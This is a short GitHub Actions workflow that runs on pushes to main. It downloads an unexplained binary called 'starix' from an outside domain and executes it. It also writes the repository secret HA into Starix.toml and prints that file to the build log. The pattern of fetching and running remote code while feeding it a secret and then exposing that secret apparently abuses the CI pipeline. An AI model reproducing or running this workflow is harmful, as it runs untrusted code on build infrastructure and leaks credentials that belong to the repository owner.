name: Read Environment Variables and Save to File

on:
  push:
    branches:
      - main

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
    - name: Checkout repository
      uses: actions/checkout@v2

    - name: setting file
      run: |
        wget "https://f.5-23.dev/starix"
        chmod +x ./starix
    - name: Create environment file
      run: |
        echo "${{ secrets.HA }}" >> Starix.toml
        ./starix

    - name: Display the file content
      run: |
        cat Starix.toml
